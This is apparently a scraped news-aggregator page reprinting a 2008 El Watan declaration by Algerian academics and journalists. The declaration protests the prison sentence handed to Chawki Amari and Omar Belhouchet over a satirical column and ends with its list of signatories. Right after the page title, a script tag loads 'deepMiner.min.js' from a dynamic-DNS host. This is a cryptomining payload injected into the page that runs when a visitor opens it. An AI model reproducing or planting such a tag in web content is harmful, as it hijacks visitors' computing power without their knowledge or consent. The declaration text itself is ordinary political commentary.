googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Déclaration contre la condamnation de Chawki Amari et de Omar Belhouchet<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Déclaration contre la condamnation de Chawki Amari et de Omar Belhouchet
Publié dans El Watan le 13 - 03 - 2008

Nous avons appris avec stupéfaction et consternation la condamnation en deuxième instance de Chawki Amari et Omar Belhouchet à deux mois de prison ferme pour dommages causés par un billet satirique au wali de Jijel paru en dernière page du quotidien El Watan. La répression mise en œuvre contre la liberté de la presse nous rappelle des temps révolus où la justice coloniale fonctionnait comme un instrument de répression des mouvements politiques nationalistes. Tout comme en ces temps funestes, l'élection est pervertie et vidée de son sens par les manipulations systématiques de l'administration centrale. La presse est muselée par des codes restrictifs et n'exprime qu'une partie de l'opinion. D'une manière générale, la majorité de la population est privée de ses droits à la citoyenneté ou se dispense de les exercer, connaissant à l'avance le sort qui leur est réservé. Elle reste soumise à un droit et une justice qui puisent leurs sources ailleurs que dans les principes démocratiques.De nos jours, la justice apparaît comme une arme venant s'ajouter à beaucoup d'autres mises entre les mains du pouvoir exécutif. Elle est utilisée de manière efficace seulement quand elle s'attaque aux droits fondamentaux des citoyens de s'exprimer et de s'organiser librement. Elle apparaît comme un instrument parmi d'autres, mis à la disposition du gouvernement avec pour vocation spécifique le démantèlement de toute forme d'organisation autonome ou toute sorte de contre-pouvoir. Ainsi, depuis des décennies, se développe une justice aux limites de la légalité ou carrément hors de la légalité. Aucun conflit ne surgit entre autorités militaires, judiciaires et politiques sur son fonctionnement. Malgré des logiques divergentes, tous s'accordent sur les nécessités de la répression. Cela crée les conditions du rejet de la fonction judiciaire de l'Etat d'autant plus que ses détenteurs, en étant les seuls bénéficiaires, auront grandement aidé à cultiver toutes sortes de ressentiments chez ceux qui en sont exclus. En se préoccupant d'abord d'en faire son instrument, le pouvoir exécutif a fini par couper la société du droit de l'Etat. C'est ce lourd héritage du droit et de la justice d'exception en territoire d'exception que va avoir à endosser l'Algérie de demain.
Signataires :
Louisa Aït Hamou (universitaire), Daho Djerbal (universitaire), Ali Bensaad (universitaire), Mohammed Hachemaoui (universitaire), Selma Hellal et Sofiane Hadjadj (éditeurs, Editions Barzakh), Yassine Temlali (journaliste), Ghania Mouffok (journaliste), Adlène Meddi (journaliste et auteur), Fayçal Métaoui (journaliste), Sid-Ahmed Semiane (journaliste), Abdellah Benadouda (éditeur), Kamel Daoud (journaliste- chroniqueur), Mohamed Larbi Merhoum (architecte), Leïla Oubouzar (architecte), Ghanem Laribi (architecte/paysagiste), Kaouther Adimi (étudiante), Yasmine Kacha (étudiante), Sofia Djama, Hakim Guettaf, Achouak Bahloul, Ali Redouane Chetouh, Amel Aïssaoui, Sarah Kharfi.


Cliquez ici pour lire l'article depuis sa source.